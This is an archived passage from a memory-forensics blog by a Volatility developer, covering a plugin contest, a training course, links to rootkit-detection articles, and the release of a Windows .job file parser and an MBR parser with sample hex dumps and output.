<li>2nd place wins 500 USD cash</li>
<li>3rd place wins 250 USD cash</li>
<li>4th and 5th place wins Volatility swag (T-shirts, Stickers, etc)</li>
</ul>
<br />
Everyone but the Volatility core developers can participate.<br />
<br />
<u>Rules of Engagement</u><br />
<br />
<ol>
<li>The goal of the contest is to create innovative, interesting, and useful extensions for The Volatility Framework. While extensions written in Python are preferred, extensions written in other languages will also be considered.</li>
<li>The submitted extensions should work with the Volatility 2.2 (or greater) release and should have been implemented after the initial contest announcement (1/14/2013).</li>
<li>The top 5 winners of the contest will get the prizes mentioned above.</li>
<li>Volatility core developers are not eligible.</li>
<li>Submissions should be sent to volcon2013@memoryanalysis.net. The submission should include the source code, a short description of how the extension is used, and a signed "Individual Contributor License Agreement".</li>
<li>By submitting an entry, you declare that you own the copyright to the source code and are authorized to submit it.</li>
<li>All submissions should be received no later than August 1, 2013. The winner will be announced the following week. We recommend submitting early. In the case of similar submissions, preference will be shown to early submissions.</li>
<li>The Volatility Project core developers will decide the winners based on the following criteria: creativity, usefulness, effort, completeness, submission date, and clarity of documentation.</li>
<li>In order to collect the cash prizes, the winner will need to provide a legal picture identification and bank account information within 30 days of notification. The bank transfer will be made within two weeks after the winner is authenticated.</li>
<li>Group entries are allowed; the prize will be paid (or seat will be registered, if the training option is desired) to the person designated by the group.</li>
<li>Upon approval from the winners, their names/aliases will be listed on the "Volatility Hall of Fame" web page for the world to admire.</li>
<li>Selected contestants may also be asked to present their work at the 2013 Open Memory Forensics Workshop or have their research featured on the Volatility Labs Blog.</li>
</ol>
<br />
<u>Acknowledgements</u><br />
<br />
A special thanks goes out to the Hex-Rays team for providing the inspiration and template for this contest. <br />
<br /></blockquote>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-64267643805190657742012-11-13T13:36:00.001-05:002012-11-13T13:36:26.840-05:00Windows Memory Forensics Training for Analysts by Volatility Developers<span style="font-family: inherit;">We are pleased to announce the first public offering of the Windows Memory Forensics for Analysts training course. This is the only memory forensics course officially designed, sponsored, and taught by the Volatility developers. One of the main reasons we made Volatility open-source is to encourage and facilitate a deeper understanding of how memory analysis works, where the evidence originates, and how to interpret the data collected by the framework's extensive set of plugins. Now you can reap these benefits first hand from the developers of the most powerful, flexible, and innovative memory forensics tool. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Please see the following details about the upcoming training event:</span><br />
<br />
Dates: Monday, December 3rd through Friday, December 7th 2012<br />
Location: Reston, Virginia (exact location will be shared upon registration)<br />
Instructors: Michael Ligh (<a href="http://twitter.com/imhlv2">@iMHLv2</a>), Andrew Case (<a href="http://twitter.com/attrc">@attrc)</a>, Jamie Levy (<a href="http://twitter.com/gleeda">@gleeda</a>). Please see the <a href="http://code.google.com/p/volatility/wiki/VolatilityTeam">VolatilityTeam</a> wiki page for brief bios.<br />
<br />
<b>Overview:</b><br />
<br />
The ability to perform digital investigations and incident
response is becoming a critical skill for many occupations.
Unfortunately, digital investigators frequently lack the training or experience
to take advantage of the volatile artifacts found in physical memory. Volatile
memory contains valuable information about the runtime state of the system,
provides the ability to link artifacts from traditional forensic analysis
(network, file system, registry), and provides the ability to ascertain
investigative leads that have been unbeknownst to most analysts. Malicious
adversaries have been leveraging this knowledge disparity to undermine many
aspects of the digital investigation process with such things as anti-forensics
techniques, memory resident malware, kernel rootkits, encryption (file systems,
network traffic, etc), and Trojan defenses. The only way to
turn-the-tables and defeat a creative digital human adversary is through
talented analysts.<br />
<br />
This course will demonstrate why memory forensics is a
critical component of the digital investigation process and how investigators
can gain the upper hand. The course will
consist of lectures on specific topics in Windows memory forensics followed by
intense hands-on exercises to put the topics into real world contexts. Exercises will
require analysis of malware in memory, kernel-level rootkits, registry artifacts found in
memory, signs of data exfiltration, and much more. This course is your
opportunity to learn these invaluable skills from the researchers and
developers that have pioneered the field. This is also the only memory
forensics training class that is authorized to teach Volatility, officially
sponsored by The Volatility Project, and taught directly by the Volatility
developers.<br />
<br />
<b>Who should attend?</b><br />
<br />
This course is intended for malware analysts, reverse engineers,
incident responders, digital forensics analysts, law enforcement
officers, federal agents, system administrators, corporate
investigators, or anyone who wants to develop the skills necessary to
combat advanced adversaries.<br />
<br />
<b>Course Prerequisites</b><br />
<ul>
<li>It is recommended that students have some experience with the Volatility Framework.</li>
<li>Students should possess a basic knowledge of digital investigation tools and techniques.</li>
<li>Students should be comfortable with general troubleshooting of
both Linux and Windows operating systems (setup, configuration,
networking)</li>
<li>Students should be familiar with popular system administration tools (i.e. Sysinternals Utilities)</li>
<li>Student should be both familiar and comfortable with using the command line</li>
<li>Student should have a basic understanding of Python or similar scripting language</li>
</ul>
<b>Course Structure</b><br />
<br />
This is a 5-day course composed of both classroom learning and hands-on
training exercises and scenarios. All course material, lunches, and
coffee breaks will be provided (If you have unique dietary restrictions,
please make them known during registration).<br />
<br />
<b>Course Requirements</b><br />
<br />
In order to fully participate in the course, students are required to
bring a properly pre-configured laptop. Students are encouraged to
bring laptops that can run both Linux and Windows, where either instance
is virtualized based on student preference. It is the student's
responsibility to make sure the laptop is configured prior to the
beginning of the course. There is no time built into the course schedule to
help people configure machines, so please make sure your laptop has
been properly configured before showing up for class.<br />
<br />
Minimum Hardware Requirements:<br />
2.0 GHz CPU<br />
4 GB of RAM<br />
20 GB of disk space<br />
DVD-ROM drive<br />
USB 2.0 ports<br />
Wireless Network Interface Card<br />
<br />
Software Requirements:<br />
Python 2.6 or 2.7<br />
Microsoft Windows Debugger<br />
VMware Workstation 6/Fusion 3 or higher<br />
7-Zip (or ability to decompress zip, gzip, rar, etc)<br />
Wireshark<br />
<br />
Additional free/open-source tools or libraries may be required to complete hands-on exercises. More information will be shared upon registration.<br />
<br />
<b>Course Fee:</b><br />
<br />
The cost of the course is $3500. Law enforcement, government, and educational discounts are available.<br />
<br />
<b>Registration: </b><br />
<br />
To obtain information on registration, please email voltraining [ @ ] memoryanalysis.net.<br />
<b><br /></b>
<b>Other Course Benefits:</b><br />
<br />
Students will be supporting open source development (Volatility)<br />
Preparation for the Advanced Memory Analyst Certification (AMAC)Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-10438630248420869972012-11-12T13:23:00.000-05:002012-11-13T13:36:21.252-05:00ACSAC 2012I will be teaching a full day course on Windows Forensics and IR at <a href="http://www.acsac.org/">Annual Computer Security Applications Conference (ACSAC)</a> on December 4th at the <a href="http://www.acsac.org/2012/hotel/">Buena Vista Palace Hotel & Spa</a> in Orlando, FL. There is still time to <a href="http://www.acsac.org/2012/registration/">sign up</a> for the conference and/or training and it looks like a <a href="http://www.acsac.org/2012/openconf/modules/request.php?module=oc_program&action=program.php&p=at_a_glance">good program</a> this year.Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-86853425974908074632012-09-29T20:05:00.002-04:002012-09-29T20:06:50.188-04:00Week 3 of the Month of Volatility Plugins posted!Cross listed from <a href="http://memoryforensics.blogspot.com/2012/09/week-3-of-month-of-volatility-plugins.html">Andrew Case's blog</a>:<br />
<br />
<blockquote class="tr_bq">
I was writing to announce that week 3 of the month of Volatility plugins
is finished, and we now have five more in-depth blog posts covering
Windows
and Linux internals and rootkit detection as well as a bonus plugin that
analyzes Internet Explorer browsing history. These have all been posted
on
the Volatility Labs blog.<br />
<br />
Post 1: Detecting Malware Hooks in the Windows GUI Subsystem<br />
<br />
This Windows focused post covers detecting malware hooks in the Windows
GUI subsystem, including message hooks and event hooks, and what effects
these hooks can have on a compromised system.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html">http://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html</a><br />
<br />
<br />
Post 2: Shellbags in Memory, SetRegTime, and TrueCrypt Volumes<br />
<br />
This Windows focused post covers finding and recovering shellbags from
memory, the forensics importance of shellbags, and analyzes the effects
of anti-forensics on shellbag timestamps. It concludes with covering the
traces left in shellbags by TrueCrypt.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-32-shellbags-in-memory-setregtime.html">http://volatility-labs.blogspot.com/2012/09/movp-32-shellbags-in-memory-setregtime.html</a><br />
<br />
<br />
Post 3: Analyzing USER Handles and the Win32k.sys Gahti
<br />
<br />
This Windows focused post introduces two new plugins, one named <span style="font-family: Courier New, Courier, monospace;">gahti</span> that determines the various different types of USER objects on a system and another named <span style="font-family: Courier New, Courier, monospace;">userhandles</span> which traverses the handle table entries and associates them with the owning processes or threads<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-33-analyzing-user-handles-and.html">http://volatility-labs.blogspot.com/2012/09/movp-33-analyzing-user-handles-and.html</a><br />
<br />
<br />
Post 4: Recovering tagCLIPDATA: What's In Your Clipboard?
<br />
<br />
This Windows focused post covers recovery of the Windows clipboard from physical memory.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-34-recovering-tagclipdata-whats-in.html">http://volatility-labs.blogspot.com/2012/09/movp-34-recovering-tagclipdata-whats-in.html</a><br />
<br />
<br />
Post 5: Analyzing the 2008 DFRWS Challenge with Volatility
<br />
<br />
This Linux focused post analyzes the 2008 memory challenge with
Volatility. It walks through the artifacts produced by the winning team
and shows how to recover the same information with Volatility. It then
shows plugins in Volatility that can recover artifacts not produced by
the winning team.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-35-analyzing-2008-dfrws-challenge.html">http://volatility-labs.blogspot.com/2012/09/movp-35-analyzing-2008-dfrws-challenge.html</a><br />
<br />
<br />
Bonus Post: HowTo: Scan for Internet Cache/History and URLs<br />
<br />
This Windows focused post covers how to recover Internet Explorer's cache and history from a memory sample.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/howto-scan-for-internet-cachehistory.html">http://volatility-labs.blogspot.com/2012/09/howto-scan-for-internet-cachehistory.html</a><br />
<br />
If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog.
</blockquote>
Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-5214140298747107612012-09-21T11:16:00.000-04:002012-09-21T11:17:00.269-04:00Week 2 of the Month of Volatility Plugins posted!It's been an exciting week in the <a href="http://code.google.com/p/volatility/">Volatility</a> community. We've just finished our second week of Month of Volatility Plugins (MoVP) blogposts, released <a href="http://code.google.com/p/volatility/downloads/list">Volatility 2.2 RC2</a> for testing, fixed a few minor bugs and now we're gearing up for our third week of posts and the upcoming <a href="https://www.volatilesystems.com/default/omfw">Open Memory Forensics Workshop (OMFW)</a>. Here is a list of this week's posts, <a href="http://memoryforensics.blogspot.com/2012/09/week-2-of-month-of-volatility-plugins.html">compiled by Andrew Case</a>:<br />
<br />
<blockquote class="tr_bq">
I was writing to announce that week 2 of the month of Volatility plugins
is finished, and we now have five more in-depth blog posts covering Windows
and Linux internals and rootkit detection. These have all been posted to
the new Volatility Labs blog.<br />
<b><br />Post 1: Atoms (The New Mutex), Classes and DLL Injection
</b>
<br />
<br />
This Windows focused post covers investigating malware and understanding infections by analyzing the atom tables.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-21-atoms-new-mutex-classes-and-dll.html">http://volatility-labs.blogspot.com/2012/09/movp-21-atoms-new-mutex-classes-and-dll.html</a><br />
<br />
<b>Post 2: Malware in your Windows</b><br />
<br />
This Windows focused post covers enumerating and analyzing windows in the GUI subsystem.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-22-malware-in-your-windows.html">http://volatility-labs.blogspot.com/2012/09/movp-22-malware-in-your-windows.html</a><br />
<br />
<b>Post 3: Event logs and Service SIDs</b><br />
<br />
This Windows focused post demonstrates recovering event logs from memory and calculating service SIDs.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-23-event-logs-and-service-sids.html">http://volatility-labs.blogspot.com/2012/09/movp-23-event-logs-and-service-sids.html</a><br />
<br />
<b>Post 4: Analyzing the Jynx rootkit and LD_PRELOAD
</b><br />
<br />
This Linux focused post covers analyzing the Jynx rootkit as well as generic methods for analyzing LD_PRELOAD based rootkits. </blockquote>
<blockquote class="tr_bq">
<a href="http://volatility-labs.blogspot.com/2012/09/movp-24-analyzing-jynx-rootkit-and.html">http://volatility-labs.blogspot.com/2012/09/movp-24-analyzing-jynx-rootkit-and.html</a><br />
<br />
<b>Post 5: Investigating In-Memory Network Data with Volatility
</b><br />
<br />
This Linux focused post goes through each of the Linux Volatility
plugins related to recovering network data from memory, such as network
connections, packets, and the routing cache.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-25-investigating-in-memory-network.html">http://volatility-labs.blogspot.com/2012/09/movp-25-investigating-in-memory-network.html</a><br />
<br />
If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog.
</blockquote>
<br />
We hope you've enjoyed this week's series. Stay tuned, we have much more in store! <br />
<span class="post-author vcard"></span>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-33046890057329702922012-09-14T13:00:00.001-04:002012-09-14T13:01:13.714-04:00Week 1 of the Month of Volatility Plugins posted! I'm going to borrow from <a href="http://memoryforensics.blogspot.com/2012/09/week-1-of-month-of-volatility-plugins.html">Andrew's blog</a> here to let you know about our Month of Volatility Plugins:<br />
<br />
<blockquote class="tr_bq">
I was writing to announce that week 1 of the month of Volatility plugins
is finished, and we now have five in-depth blog posts covering Windows
and Linux internals and rootkit detection. These have all been posted to
the new Volatility Labs blog.<br />
<br />
Post 1: Logon Sessions, Processes, and Images<br />
<br />
This Windows focused post covers linking processes to their logon
session, detecting hidden processes using session structures, and
determining the loaded the drivers mapped into each session.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-11-logon-sessions-processes-and.html" target="_blank">http://volatility-labs.<wbr></wbr>blogspot.com/2012/09/movp-11-<wbr></wbr>logon-sessions-processes-and.<wbr></wbr>html</a><br />
<br />
Post 2: Window Stations and Clipboard Malware<br />
<br />
This Windows focused post covers enumerating and analyzing window stations and clipboard monitoring malware.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-12-window-stations-and-clipboard.html" target="_blank">http://volatility-labs.<wbr></wbr>blogspot.com/2012/09/movp-12-<wbr></wbr>window-stations-and-clipboard.<wbr></wbr>html</a><br />
<br />
Post 3: Desktops, Heaps, and Ransomware<br />
<br />
This Windows focused post covers finding rogue desktops used to hide
applications and created by ransomware, linking threads to desktops,
analyzing the desktop heap for memory corruptions, and profiling heap
allocations to locate USER objects.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-13-desktops-heaps-and-ransomware.html" target="_blank">http://volatility-labs.<wbr></wbr>blogspot.com/2012/09/movp-13-<wbr></wbr>desktops-heaps-and-ransomware.<wbr></wbr>html</a><br />
<br />
Post 4: Average Coder Rootkit, Bash History, and Elevated Processes<br />
<br />
This Linux focused post covers analyzing the Average Coder rootkit,
recovering .bash_history from memory, even when faced with
anti-forensics, and finding elevated processes.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-14-average-coder-rootkit-bash.html" target="_blank">http://volatility-labs.<wbr></wbr>blogspot.com/2012/09/movp-14-<wbr></wbr>average-coder-rootkit-bash.<wbr></wbr>html</a><br />
<br />
Post 5: KBeast Rootkit, Detecting Hidden Modules, and sysfs<br />
<br />
This Linux focused post covers analyzing the KBeast rootkit, finding
modules unlinked from the module list, and the forensic values of sysfs.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-15-kbeast-rootkit-detecting-hidden.html" target="_blank">http://volatility-labs.<wbr></wbr>blogspot.com/2012/09/movp-15-<wbr></wbr>kbeast-rootkit-detecting-<wbr></wbr>hidden.html</a><br />
<br />
<br />
If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog.
</blockquote>
<br />
Future Volatility posts will appear on our official blog (<a href="http://volatility-labs.blogspot.com/">http://volatility-labs.blogspot.com/</a>). Also you might want to follow our project on twitter: <a href="https://twitter.com/volatility">@Volatility</a> for updates and news. See you at <a href="https://www.volatilesystems.com/default/omfw">OMFW!</a>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-85720034859287965572012-09-01T19:26:00.001-04:002012-09-03T16:17:49.422-04:00Job File Parser<p>While writing material for the <a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_digital_forensics.html target="_blank">Blackhat training course</a> that <a href="https://twitter.com/attrc">Andrew Case</a> and I gave this summer, I realized that there did not appear to be many tools that would parse <a href="http://msdn.microsoft.com/en-us/library/cc248285%28v=prot.13%29.aspx">job files</a>. At that time, <a href="https://twitter.com/keydet89">Harlan Carvey</a> had <a href="http://windowsir.blogspot.com/2009/09/parsing-job-files.html">written a blogpost</a> on job files and had mentioned them in part of his <a href="http://windowsir.blogspot.com/p/timelines.html">timeline</a> materials, but he had not yet released his Perl script (It has since been released <a href="http://code.google.com/p/winforensicaanalysis/downloads/detail?name=jobparse.pl&can=2&q=">here</a>). This prompted me to write up a parser of my own in Python.</p>
<p>.job files consist of two sections: 1) <a href="http://msdn.microsoft.com/en-us/library/cc248286%28v=prot.13%29.aspx">Fixed Length</a> and 2) <a href="http://msdn.microsoft.com/en-us/library/cc248287%28v=prot.13%29.aspx">Variable Length</a>. The MSDN documentation is fairly good for letting us know how to parse out these sections. </p>
<p>So what does a .job file look like?</p>
<pre><p class="code">
$ xxd At5.job
0000000: 0006 0100 e378 73f7 4d8b 2a45 a589 1cc5 .....xs.M.*E....
0000010: fa64 cfd2 4600 cc00 0000 0000 3c00 0a00 .d..F.......<...
0000020: 2000 0000 0014 730f 0000 0000 0513 0400 .....s.........
0000030: 0200 e421 dc07 0700 0100 1000 0b00 1a00 ...!............
0000040: 0000 0f00 0000 0400 6300 6d00 6400 0000 ........c.m.d...
0000050: 0f00 2f00 6300 2000 6e00 6f00 7400 6500 ../.c. .n.o.t.e.
0000060: 7000 6100 6400 2e00 6500 7800 6500 0000 p.a.d...e.x.e...
0000070: 0000 0700 5300 5900 5300 5400 4500 4d00 ....S.Y.S.T.E.M.
0000080: 0000 1e00 4300 7200 6500 6100 7400 6500 ....C.r.e.a.t.e.
0000090: 6400 2000 6200 7900 2000 4e00 6500 7400 d. .b.y. .N.e.t.
00000a0: 5300 6300 6800 6500 6400 7500 6c00 6500 S.c.h.e.d.u.l.e.
00000b0: 4a00 6f00 6200 4100 6400 6400 2e00 0000 J.o.b.A.d.d.....
00000c0: 0000 0800 0000 0000 0000 0000 0100 3000 ..............0.
00000d0: 0000 dc07 0700 1000 0000 0000 0000 0b00 ................
00000e0: 1a00 0000 0000 0000 0000 0000 0000 0000 ................
00000f0: 0000 feff ffff fd68 7377 0000 0000 0100 .......hsw......
0000100: 0100 0416 10dd 78d9 b300 f7f0 9b20 9bd8 ......x...... ..
0000110: a0c4 5108 c943 d5c9 c64f 47ea 6052 0349 ..Q..C...OG.`R.I
0000120: 23e1 e1ab 6815 e8ef 219e 6d3b aa88 1360 #...h...!.m;...`
0000130: 706b c27b 2e44 9db1 4e89 81ca dd0a 869e pk.{.D..N.......
0000140: 2b61 .6..
</p></pre>
<p>We can see the first section of the job file below:</p>
<pre><p class="code">
0000000: 0006 0100 e378 73f7 4d8b 2a45 a589 1cc5 .....xs.M.*E....
0000010: fa64 cfd2 4600 cc00 0000 0000 3c00 0a00 .d..F.......<...
0000020: 2000 0000 0014 730f 0000 0000 0513 0400 .....s.........
0000030: 0200 e421 dc07 0700 0100 1000 0b00 1a00 ...!............
0000040: 0000 0f00 ....
</p></pre>
<p> The fixed length section is pretty straightforward (I will only fill in a few):<br>
0-2 : <a href="http://msdn.microsoft.com/en-us/library/2d1fbbab-fe6c-4ae5-bdf5-41dc526b2439%28v=prot.13%29#id11
">Product Info</a> (0x600 - Vista)<br>
2-4 : File Version (0x1)<br>
4-20 : <a href="http://msdn.microsoft.com/en-us/library/aa379358%28v=vs.85%29.aspx">UUID</a> ({F77378E3-8B4D-452A-A589-1CC5FA64CFD2})<br>
20-22: Application Name Offset (0x46)<br>
22-24: Trigger Offset (0xcc)<br>
24-26: Error Retry Count (0x00)<br>
26-28: Error Retry Interval (0x00)<br>
28-30: Idle Deadline (0x3c)<br>
30-32: Idle Wait (0xa)<br>
32-36: Priority<br>
36-40: Maximum Runtime<br>
40-44: Exit Code (0x0)<br>
44-48: Status (0x41305)<br>
48-52: <a href="http://msdn.microsoft.com/en-us/library/cc248283%28v=prot.13%29.aspx">Flags</a><br>
52-68: Run Date (Monday Jul 16 11:26:00.15 2012)<br>
</p>
<p>The variable length section actually contains sizes (denoted in red below) before some of the data members mentioned in the MSDN documentation:</p>
<pre><p class="code">
0000 <font color="red">0400</font> 6300 6d00 6400 0000 ...c.m.d...
0000050: <font color="red">0f00</font> 2f00 6300 2000 6e00 6f00 7400 6500 ../.c. .n.o.t.e.
0000060: 7000 6100 6400 2e00 6500 7800 6500 0000 p.a.d...e.x.e...
0000070: <font color="red">0000</font> <font color="red">0700</font> 5300 5900 5300 5400 4500 4d00 ....S.Y.S.T.E.M.
0000080: 0000 <font color="red">1e00</font> 4300 7200 6500 6100 7400 6500 ....C.r.e.a.t.e.
0000090: 6400 2000 6200 7900 2000 4e00 6500 7400 d. .b.y. .N.e.t.
00000a0: 5300 6300 6800 6500 6400 7500 6c00 6500 S.c.h.e.d.u.l.e.
00000b0: 4a00 6f00 6200 4100 6400 6400 2e00 0000 J.o.b.A.d.d.....
00000c0: 0000 0800 0000 0000 0000 0000 0100 3000 ..............0.
00000d0: 0000 dc07 0700 1000 0000 0000 0000 0b00 ................
00000e0: 1a00 0000 0000 0000 0000 0000 0000 0000 ................
00000f0: 0000 feff ffff fd68 7377 0000 0000 0100 .......hsw......
0000100: 0100 0416 10dd 78d9 b300 f7f0 9b20 9bd8 ......x...... ..
0000110: a0c4 5108 c943 d5c9 c64f 47ea 6052 0349 ..Q..C...OG.`R.I
0000120: 23e1 e1ab 6815 e8ef 219e 6d3b aa88 1360 #...h...!.m;...`
0000130: 706b c27b 2e44 9db1 4e89 81ca dd0a 869e pk.{.D..N.......
0000140: 2b61 .6..
</p></pre>
<p>Going over some of the data above we have:<br>
Running instance count <br>
Command Name Length (0x4 - includes ending '\x00')<br>
Command Name (cmd )<br>
Parameter length (0xf)<br>
Parameter (/c notepad.exe )<br>
Working Directory Length (0x0)<br>
Working Directory (if Working Directory Length > 0)<br>
User Name Length (0x7)<br>
User Name (SYSTEM)<br>
Comment Length (0x1e)<br>
Comment (if Comment length > 0 - Created by NetScheduleJobAdd. )<br>
<a href="http://msdn.microsoft.com/en-us/library/cc248306%28v=prot.13%29">User Data / Reserved data </a><br>
Trigger count<br>
<a href="http://msdn.microsoft.com/en-us/library/cc248290%28v=prot.13%29">Triggers</a><br>
- Scheduled date (Jul 16 11:26:00.0 2012)<br>
<a href="http://msdn.microsoft.com/en-us/library/cc248299%28v=prot.13%29">Job Signature</a> <br>
</p>
<p>So I am releasing a job file parser script that can parse out almost all of these items mentioned above. You can find it <a href="https://raw.github.com/gleeda/misc-scripts/master/misc_python/jobparser.py">here</a>. The only things left off are the user/reserved data, some of the trigger data and the job signature sections. I have only tested this on 32 bit *nix systems, so let me know if you hit issues on another platforms. You can see an example output of the above job file below:</p>
<pre><p class="code">
$ python jobparser.py -f At5.job
Product Info: Windows Vista
File Version: 1
UUID: {F77378E3-8B4D-452A-A589-1CC5FA64CFD2}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Monday Jul 16 11:26:00.15 2012
Running Instances: 0
Application: cmd
Parameters: /c notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Jul 16 11:26:00.0 2012
</p></pre>
<p>Here is some output of job files taken from a Windows 2008 machine:</p>
<pre><p class=code>
$ python jobparser.py -d Tasks/
************************************************************************
File: Tasks/At1.job
Product Info: Windows Vista
File Version: 1
UUID: {CE14B659-4115-4263-BFAD-A8318428AB68}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Task not yet run
Running Instances: 0
Application: notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Jul 17 02:20:00.0 2012
************************************************************************
************************************************************************
File: Tasks/At2.job
Product Info: Windows Vista
File Version: 1
UUID: {46F61E52-4581-49A9-9AD0-2244C206AEEB}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Task not yet run
Running Instances: 0
Application: notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Jul 16 14:20:00.0 2012
************************************************************************
</p></pre>
<p>And here are a couple of XP Tasks, notice that one has "Running Instances" value of "1", this was copied when the command was currently running:</p>
<pre><p class="code">
************************************************************************
File: Solitaire.job
Product Info: Windows XP
File Version: 1
UUID: {3824DDBB-A037-4016-B99A-28BD95D429AF}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Task has not run
Flags: TASK_FLAG_INTERACTIVE, TASK_FLAG_DELETE_WHEN_DONE
Date Run: Monday Aug 13 12:37:00.10 2012
Running Instances: 1
Application: C:\WINDOWS\system32\sol.exe
Working Directory: C:\WINDOWS\system32
User: user
Comment: Comment not set
Scheduled Date: Aug 13 12:37:00.0 2012
************************************************************************
************************************************************************
File: Solitaire2.job
Product Info: Windows XP
File Version: 1
UUID: {3824DDBB-A037-4016-B99A-28BD95D429AF}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Task is ready to run
Flags: TASK_FLAG_INTERACTIVE, TASK_FLAG_DELETE_WHEN_DONE
Date Run: Monday Aug 13 12:37:00.10 2012
Running Instances: 0
Application: C:\WINDOWS\system32\sol.exe
Working Directory: C:\WINDOWS\system32
User: user
Comment: Comment not set
Scheduled Date: Aug 13 12:37:00.0 2012
************************************************************************
</p></pre>
<p>References:<br><br>
[1] Windows Forensic Analysis 2nd Ed., Harlan Carvey<br>
[2] .JOB File Format, http://msdn.microsoft.com/en-us/library/cc248285%28v=prot.13%29.aspx<br>
[3] Windows Scheduler (at job) Forensics, http://computer-forensics.sans.org/blog/2009/09/16/windows-scheduler-at-job-forensics<br>
</p>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com9tag:blogger.com,1999:blog-30542938.post-53018579549142059792012-04-21T21:19:00.000-04:002012-04-22T07:18:45.508-04:00MBR Parser<p>With the increase in <a href="http://forensicmethods.com/mbr-malware">MBR infectors</a>, I've decided to release a script I wrote that parses the MBR as well as hashes and disassembles the bootcode. I've found that MBR bootcode is pretty stable across systems of the same OS, so this script should allow you to quickly check for any discrepancies on a system.</p>
<p>You of course need Python and <a href="http://code.google.com/p/distorm/">Distorm</a> to use this script.</p>
<p>A shortened example output can be seen below:</p>
<pre>
<p class="code">
$ python mbr_parser.py -f mbr.bin
Disk signature: 96-80-96-80
Bootcode md5: 4ad444d4e7efce9485a94186c3f4b157
Bootcode Disassembly:
00000000: 33c0 XOR AX, AX
00000002: 8ed0 MOV SS, AX
00000004: bc007c MOV SP, 0x7c00
00000007: fb STI
00000008: 50 PUSH AX
00000009: 07 POP ES
0000000a: 50 PUSH AX
0000000b: 1f POP DS
0000000c: fc CLD
0000000d: 50 PUSH AX
0000000e: be007c MOV SI, 0x7c00
00000011: bf0006 MOV DI, 0x600
00000014: b90002 MOV CX, 0x200
00000017: f3a4 REP MOVSB
00000019: bf1e06 MOV DI, 0x61e
0000001c: 57 PUSH DI
0000001d: cb RETF
0000001e: b441 MOV AH, 0x41
00000020: b280 MOV DL, 0x80
00000022: bbaa55 MOV BX, 0x55aa
00000025: cd13 INT 0x13
00000027: 81fb55aa CMP BX, 0xaa55
0000002b: 7530 JNZ 0x5d
0000002d: f6c101 TEST CL, 0x1
00000030: 742b JZ 0x5d
00000032: be0008 MOV SI, 0x800
00000035: c7041000 MOV WORD [SI], 0x10
00000039: c744020600 MOV WORD [SI+0x2], 0x6
[snip]
000001b2: 0000 ADD [BX+SI], AL
000001b4: 002c ADD [SI], CH
000001b6: 44 INC SP
000001b7: 63 DB 0x63
===== Partition Table #1 =====
Boot flag: 0x80 (Bootable)
Partition type: 0x7 (NTFS)
Starting Sector (LBA): 0x3f (63)
Starting CHS: Cylinder: 0 Head: 1 Sector: 1
Ending CHS: Cylinder: 520 Head: 254 Sector: 63
Size in sectors: 0x7fb68a (8369802)
===== Partition Table #2 =====
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
===== Partition Table #3 =====
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
===== Partition Table #4 =====
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
